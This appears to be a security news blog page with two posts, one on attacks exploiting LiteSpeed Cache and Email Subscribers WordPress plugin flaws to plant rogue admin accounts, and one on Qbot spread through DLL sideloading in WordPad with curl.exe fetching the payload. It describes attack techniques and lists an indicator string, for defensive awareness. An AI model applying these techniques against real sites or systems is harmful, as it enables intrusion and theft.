Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label WordPad Vulnerability. Show all posts

WordPress Vulnerabilities, Exploiting LiteSpeed Cache and Email Subscribers Plugins

 

In recent cybersecurity developments, hackers have been leveraging a critical vulnerability within the LiteSpeed Cache plugin for WordPress to exploit websites running outdated versions. LiteSpeed Cache, a popular caching plugin utilized by over five million WordPress sites, is designed to enhance page load times, improve user experience, and boost search engine rankings. 

However, security experts at Automattic's security team, WPScan, have observed a significant increase in malicious activities targeting WordPress sites with versions of the LiteSpeed Cache plugin older than 5.7.0.1. The vulnerability in question, tracked as CVE-2023-40000, is a high-severity unauthenticated cross-site scripting flaw. 

Attackers are taking advantage of this vulnerability to inject malicious JavaScript code into critical WordPress files or the database of vulnerable websites. By doing so, they are able to create administrator-level user accounts with specific names like 'wpsupp-user' or 'wp-configuser.' Additionally, the presence of certain strings, such as "eval(atob(Strings.fromCharCode," within the database, serves as an indicator of an ongoing compromise. 

Despite efforts by many LiteSpeed Cache users to update to newer, non-vulnerable versions, an alarming number of sites—up to 1,835,000—still operate on outdated releases, leaving them susceptible to exploitation. In a separate incident, hackers have turned their attention to another WordPress plugin called "Email Subscribers," exploiting a critical SQL injection vulnerability, CVE-2024-2876. 

This vulnerability, affecting plugin versions 5.7.14 and older, allows attackers to execute unauthorized queries on databases, thereby creating new administrator accounts on vulnerable WordPress sites. Although "Email Subscribers" boasts a significantly lower number of active installations compared to LiteSpeed Cache, with approximately 90,000, the observed attacks highlight the opportunistic nature of cybercriminals. 

To address these threats effectively, WordPress site administrators are urged to promptly update plugins to the latest versions, remove unnecessary components, and remain vigilant for signs of suspicious activity, such as the sudden creation of new admin accounts. In the event of a confirmed breach, comprehensive cleanup measures are essential, including the deletion of rogue accounts, password resets for all existing accounts, and the restoration of clean backups for both the database and site files. By staying proactive and implementing robust security practices, website owners can minimize the risk of falling victim to such malicious activities and safeguard their online assets effectively.

Threat Actors Exploit Qbot Malware: Evolving Tactics for Stealthy Attacks

Qbot malware

Qbot operators using .DLL malware to exploit windows systems

In the ever-evolving scenario of cyber threats, hostile actors continue to use sophisticated methods to enter computer systems and exploit sensitive data. One such example is the utilization of Qbot operators, who use a crafty approach by leveraging a malicious .DLL malware to hijack Windows WordPad.

This strategy allows them to evade detection and carry out their malicious activities undetected. In this blog post, we will delve into the workings of Qbot operators and explore how they exploit WordPad as a covert tool.

Threat actors exploit vulnerability in Windows 10 WordPad

According to researchers, hackers have started exploiting a vulnerability in the Windows 10 preloaded WordPad text editor to distribute the Qbot malware. ProxyLife, a member of Cryptolaemus and a cybersecurity researcher, recently uncovered an email campaign where hackers are distributing the WordPad program along with a malicious .DLL file.

After launching WordPad, the application searches for specific .DLL files required for proper functioning. Initially, it looks for these files in its folder. If the necessary .DLL files are found, WordPad automatically executes them, even if they are malicious.

What is DLL Hijacking

The technique involved in this practice is commonly known as "DLL sideloading" or "DLL hijacking" and has been utilized by hackers before. Previously, attackers were observed using the Calculator app for a similar purpose.

In this case, when WordPad executes the DLL, the malicious file leverages an executable called Curl.exe, located in the System32 folder, to download a DLL disguised as a PNG file. However, this DLL is Qbot, an old banking trojan capable of stealing emails for use in phishing attacks and initiating the download of additional malware like Cobalt Strike.

Using Wordpad to evade detection

By using legitimate programs like WordPad or Calculator to execute malicious DLL files, threat actors aim to evade antivirus programs and maintain a stealthy presence during the attack.

It's worth noting that this method relies explicitly on Curl.exe, limiting its effectiveness to Windows 10 and newer versions, as earlier iterations of the operating system did not have this program preinstalled.

Even so, considering that older versions are nearing their end of support and users are transitioning to Windows 10 and 11, this limitation provides little respite

According to recent reports from BleepingComputer, the QBot operation has transitioned to employing alternative infection methods in recent weeks. This indicates that the threat actors behind QBot are continually adapting their tactics to evade detection and improve their success rates.

As cybercriminals evolve their strategies, it becomes increasingly crucial for individuals and organizations to stay vigilant and employ robust cybersecurity measures to protect against emerging threats.